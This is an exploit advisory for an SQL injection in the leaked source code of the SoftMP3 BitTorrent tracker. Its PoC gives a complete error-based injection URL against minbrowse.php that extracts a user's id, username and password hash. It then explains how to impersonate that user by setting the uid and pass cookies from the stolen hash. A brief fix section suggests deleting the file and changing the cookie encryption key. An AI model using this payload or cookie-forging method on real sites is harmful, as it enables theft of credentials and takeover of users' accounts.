# Exploit Title: SOFTMP3 source code SQL injection # Date: 23/04/2011 # Author: mArTi # Software Link: http://softmp3.org/ # Version: No others versions available... # Tested on: Windows / Unix /.................................../ Introduction /.................................../ SoftMP3 released a source code of its bittorent tracker when it died. This source code is vulnerable to a SQL injection. Here's the PoC and the Fix /.................................../ PoC /.................................../ -> SQL http://localhost/SOFTMP3/minbrowse.php?search=string' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,users.id,0x27,users.username,0x27,users.passhash,0x27,0x7e) FROM `database`.users where id=1 LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1" -----> Then you can use this to connect as the user you want by the passhash you got and setting the following cookies : uid=id pass=encrypted passhash (see down) ---------> getting encrypted passhash to connect with the cookies /.................................../ FIX /.................................../ Delete /minbrowse.php (useless). BTW, if you want to protect the cookies, just change the cookie encryption in bittorent.php file (like the "hejsan" key or the order of terms in encryption) -------------------------------------------------------- -------------------------------------------------------- -------------------------------------------------------- -------------------------------------------------------- Protect yourself against the security breaks in your security to protect your users and your site. If you want to contact me, you'll know where to find me. -------------------------------------------------------- -------------------------------------------------------- -------------------------------------------------------- --------------------------------------------------------